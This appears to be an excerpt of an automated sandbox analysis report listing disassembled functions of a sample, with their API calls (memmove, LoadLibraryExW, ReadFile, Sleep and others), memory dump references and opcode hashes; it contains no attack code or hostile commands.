                                        • API String ID: 1802528911-0
                                        • Opcode ID: ab608465e5e9faca639ec8210663ba696b894752c02c7664093038820e435141
                                        • Instruction ID: 87f123bac6537019c8842cfba4c05e312ffc198afab78c3a50a8d6c2b07970e7
                                        • Opcode Fuzzy Hash: ab608465e5e9faca639ec8210663ba696b894752c02c7664093038820e435141
                                        • Instruction Fuzzy Hash: 230121353002009FD710EF28D859F6AB7E9EB99721F10851DE65A87391CA78EC05CB51
                                        Function 00794274 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0079889E: __getptd_noexit.LIBCMT ref: 0079889E
                                        • __lock_file.LIBCMT ref: 007942B9
                                          • Part of subcall function 00795A9F: __lock.LIBCMT ref: 00795AC2
                                        • __fclose_nolock.LIBCMT ref: 007942C4
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                        • String ID:
                                        • API String ID: 2800547568-0
                                        • Opcode ID: 33d081e9204dc0c3a184d78a4cd57bd6a252a9201895277d53dcfbd9e70cfc0e
                                        • Instruction ID: 94b532a5419d17b353e5bf1fd09344c6cfe53a36d9b92c5ade3b039936c6e0b0
                                        • Opcode Fuzzy Hash: 33d081e9204dc0c3a184d78a4cd57bd6a252a9201895277d53dcfbd9e70cfc0e
                                        • Instruction Fuzzy Hash: 95F0B432811715DADF21AB75B80AF5E6BE0BF41334F218209B8249B1C1CB7C99029B55
                                        Function 0078F55E Relevance: 3.0, APIs: 2, Instructions: 29sleeptimeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • timeGetTime.WINMM ref: 0078F57A
                                          • Part of subcall function 0077E1F0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0077E279
                                        • Sleep.KERNEL32(00000000), ref: 007E75D3
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: MessagePeekSleepTimetime
                                        • String ID:
                                        • API String ID: 1792118007-0
                                        • Opcode ID: 9ff108e5880ecd0c6c1f429045967cedaa1374bbd1e33638600cb330ede01e11
                                        • Instruction ID: a183a893481eab2a8bc659cb17363684c40d9981bd528ade5e80cd60a20ccbf5
                                        • Opcode Fuzzy Hash: 9ff108e5880ecd0c6c1f429045967cedaa1374bbd1e33638600cb330ede01e11
                                        • Instruction Fuzzy Hash: 1EF08C71240218AFD324EF79D409BA6BBE9AF49360F00802AF91DC7251DB74AC10CBD1
                                        Function 007781C6 Relevance: 1.9, APIs: 1, Instructions: 438COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 007784A6: __swprintf.LIBCMT ref: 007784E5
                                          • Part of subcall function 007784A6: __itow.LIBCMT ref: 00778519
                                        • __wcsnicmp.LIBCMT ref: 007783C4
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: __itow__swprintf__wcsnicmp
                                        • String ID:
                                        • API String ID: 712828618-0
                                        • Opcode ID: 644cb6cfc36239dde98e496c7c38761c236fa2d777c94794c5dffbcf05f0f947
                                        • Instruction ID: bc9b763ca57f4c5b5b940fb1ce5deb5ace318aac403737c305de24f49c83d0b0
                                        • Opcode Fuzzy Hash: 644cb6cfc36239dde98e496c7c38761c236fa2d777c94794c5dffbcf05f0f947
                                        • Instruction Fuzzy Hash: DAF16C71508342EFCB04EF18C89586EBBE5FF98354F54891DF98997222DB38E905CB52
                                        Function 00784040 Relevance: 1.7, APIs: 1, Instructions: 187COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9ca599920e64f453315c057626f71e299ebb78824d6afaa63b8979ad9d3f7f0c
                                        • Instruction ID: 31892802eb3c9efded63af61b420d5bc4c25a088f0426092550c2cb4aa7bcd69
                                        • Opcode Fuzzy Hash: 9ca599920e64f453315c057626f71e299ebb78824d6afaa63b8979ad9d3f7f0c
                                        • Instruction Fuzzy Hash: 6761A170A4020ADFCB14EF54C888A7AF7E5FF18310F108269E915CB691E779ED95CB91
                                        Function 0078EF0D Relevance: 1.7, APIs: 1, Instructions: 176COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1ab3293332864ad2f8f677855b868bbc014380518b242d4bcae615635a5d6874
                                        • Instruction ID: c1ffa5d590458b1b4694e8cb5168baf33e1453d99eb7cf9793a87e95eaff07cc
                                        • Opcode Fuzzy Hash: 1ab3293332864ad2f8f677855b868bbc014380518b242d4bcae615635a5d6874
                                        • Instruction Fuzzy Hash: D7518175600214EFCF14FF68C999EAD77A9AF49390B148069F50A9B393DB38ED01D750
                                        Function 0077B6D0 Relevance: 1.6, APIs: 1, Instructions: 118COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: _memmove
                                        • String ID:
                                        • API String ID: 4104443479-0
                                        • Opcode ID: 653a53b8435a0736043d6b22074b13ebbbade5d52c540747a625e5d2bf85aa42
                                        • Instruction ID: 5d43f7aecc4d9f003d0785d87308621384a33637e5e76920124800f3b123ec7d
                                        • Opcode Fuzzy Hash: 653a53b8435a0736043d6b22074b13ebbbade5d52c540747a625e5d2bf85aa42
                                        • Instruction Fuzzy Hash: 7D417B79200602DFCB28DF19D491A62F7F0FF893A1714C46AE99E8B751D734E862CB90
                                        Function 00774EE9 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                        Download Yara Rule
                                        APIs
                                        • SetFilePointerEx.KERNEL32(?,?,00000001,00000000,00000000,?,?,00000000), ref: 00774F8F
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: FilePointer
                                        • String ID:
                                        • API String ID: 973152223-0
                                        • Opcode ID: d723e349efbf28bffc0d5ed41372fcf9288cddaf9048a21fa766069dd6b4f40e
                                        • Instruction ID: f81b3286e4ec2e22c6483f77bee73100ad27272f1f2858ec83ae40f9aa2de7f7
                                        • Opcode Fuzzy Hash: d723e349efbf28bffc0d5ed41372fcf9288cddaf9048a21fa766069dd6b4f40e
                                        • Instruction Fuzzy Hash: C7314A31A00656EFCF18CF6DC484AADB7B5BF48350F18C629E81993710D778B990CB90
                                        Function 0078F92C Relevance: 1.6, APIs: 1, Instructions: 94COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: select
                                        • String ID:
                                        • API String ID: 1274211008-0
                                        • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                        • Instruction ID: bb6318223da0362e2c337507949e38b78de287586c9fa35ef7feffc337501ae7
                                        • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                        • Instruction Fuzzy Hash: AD31E670A44106EBC718EF58D484A69FBA5FF49310B24C2A5E449CB255D739EDC1CBD0
                                        Function 007EAA5A Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: ClearVariant
                                        • String ID:
                                        • API String ID: 1473721057-0
                                        • Opcode ID: 877c00c123fa2fe20e5c31693af5422860a8d4b67370274d94947031361a7747
                                        • Instruction ID: c35c41ddd1a8f92a2b30b953e4257e2e4c8e8b74d712f268c3b0fb1b5fc9a245
                                        • Opcode Fuzzy Hash: 877c00c123fa2fe20e5c31693af5422860a8d4b67370274d94947031361a7747
                                        • Instruction Fuzzy Hash: 64415A74544641CFEB24DF14C488B1ABBE1BF49308F1985ACE9994B362C379F885CF92
                                        Function 00774D67 Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: _memmove
                                        • String ID:
                                        • API String ID: 4104443479-0
                                        • Opcode ID: b501c3ab4b2fc9d96f5d5c2d5969ddedd85c14cbfe8d6392e0bbe34b327b9a08
                                        • Instruction ID: df35b579c3254656686feb991bbcf11e570d36134ed429b54b659e2f2a3651cc
                                        • Opcode Fuzzy Hash: b501c3ab4b2fc9d96f5d5c2d5969ddedd85c14cbfe8d6392e0bbe34b327b9a08
                                        • Instruction Fuzzy Hash: C221E470A00608FBCF249F52EC4566E7BF8FB5A390F21C46DE48AC5111EB3895E0DB95
                                        Function 0077D805 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: _memmove
                                        • String ID:
                                        • API String ID: 4104443479-0
                                        • Opcode ID: 850a3e34ffcf0575de9322bf5b98585c373294fd89485bbbcd9ce223ec0d444b
                                        • Instruction ID: 59451574243d92a3b29e3968b442ddc9793a7b9bf73ba18c06e82c2f903fc492
                                        • Opcode Fuzzy Hash: 850a3e34ffcf0575de9322bf5b98585c373294fd89485bbbcd9ce223ec0d444b
                                        • Instruction Fuzzy Hash: EB114976600605DFCB24DF28E481916B7F9FF49360B20C82EE88ECB661E736E841CB50
                                        Function 00773F9B Relevance: 1.6, APIs: 1, Instructions: 63libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00773F5D: FreeLibrary.KERNEL32(00000000,?), ref: 00773F90
                                          • Part of subcall function 00794129: __wfsopen.LIBCMT ref: 00794134
                                        • LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,007734E2,?,00000001), ref: 00773FCD
                                          • Part of subcall function 00773E78: FreeLibrary.KERNEL32(00000000), ref: 00773EAB
                                          • Part of subcall function 00774010: _memmove.LIBCMT ref: 0077405A
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Library$Free$Load__wfsopen_memmove
                                        • String ID:
                                        • API String ID: 1396898556-0
                                        • Opcode ID: 7a38eb5df890c3de767d4d0ebd098a2470b0549d934461a1864eac5d875e6dd1
                                        • Instruction ID: f6da697dcd8b281c5f92f47d537908814d9968fdfdc7ef3dd98b87d3be96b9eb
                                        • Opcode Fuzzy Hash: 7a38eb5df890c3de767d4d0ebd098a2470b0549d934461a1864eac5d875e6dd1
                                        • Instruction Fuzzy Hash: EF11A731600209EACF10BB64DC0AF9D77A5AF50780F10C829F545E7191DBBC9E45E750
                                        Function 007EAB2A Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: ClearVariant
                                        • String ID:
                                        • API String ID: 1473721057-0
                                        • Opcode ID: 1144bc1bee5022546c0b63715fc1374cb307be0ab8b28e2197dda4f978c8c466
                                        • Instruction ID: 9ea5694a1c3e8761392f59b5d42d6f536b4df3cb92c71d9b39e595ae8ba3c85c
                                        • Opcode Fuzzy Hash: 1144bc1bee5022546c0b63715fc1374cb307be0ab8b28e2197dda4f978c8c466
                                        • Instruction Fuzzy Hash: 3C213970548641CFEB24EF65C448B2ABBE1BF89344F15496CE99547322C339F899CF92
                                        Function 007D10E5 Relevance: 1.6, APIs: 1, Instructions: 57libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: LibraryLoad
                                        • String ID:
                                        • API String ID: 1029625771-0
                                        • Opcode ID: bd3f07c856bfe139f22b3bfc26e846088edfcf0f0a990b480d32312e14543d26
                                        • Instruction ID: 1e18efb894e4042478b9852e2af528d2c54537f7184acc61d3bffc566eaa9b5d
                                        • Opcode Fuzzy Hash: bd3f07c856bfe139f22b3bfc26e846088edfcf0f0a990b480d32312e14543d26
                                        • Instruction Fuzzy Hash: 5F11BC36201219EFDB10DF48C880A9A77F9BF49720B05816AED498B311DB39AD41CB91
                                        Function 00774CA0 Relevance: 1.6, APIs: 1, Instructions: 51fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • ReadFile.KERNEL32(?,?,00010000,?,00000000,?,00000000,00000000,?,00774E69,00000000,00010000,00000000,00000000,00000000,00000000), ref: 00774CF7
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: FileRead
                                        • String ID:
                                        • API String ID: 2738559852-0
                                        • Opcode ID: ed0fcc7a24a49d53ae40df1a63469cb0e09d24a2a6c8e06898c0738a67ba9adf
                                        • Instruction ID: 00a245c81936cd3026c9a66904ab0ef91cf27149988b029ecd99210e3b1e5974
                                        • Opcode Fuzzy Hash: ed0fcc7a24a49d53ae40df1a63469cb0e09d24a2a6c8e06898c0738a67ba9adf
                                        • Instruction Fuzzy Hash: 57115731201B049FDB31CF1AC880F66B7E9AF44394F10C81EE6AA86A50C7B9E844CB60
                                        Function 00774D29 Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: _memmove
                                        • String ID:
                                        • API String ID: 4104443479-0
                                        • Opcode ID: 8f18987bb35b2baff0789867a32b92a27879a4fd73e9d049a8f42728d02b6011
                                        • Instruction ID: ccc5ca37e085ce4d84a22699bc93753c4116b833f87e6e83cb707b14cb77391f
                                        • Opcode Fuzzy Hash: 8f18987bb35b2baff0789867a32b92a27879a4fd73e9d049a8f42728d02b6011
                                        • Instruction Fuzzy Hash: F1017CB5201542AFD705AB29C885D39F7AAFF8A3507148159E969C7702CB34AC22CBE1
                                        Function 0077CAEE Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
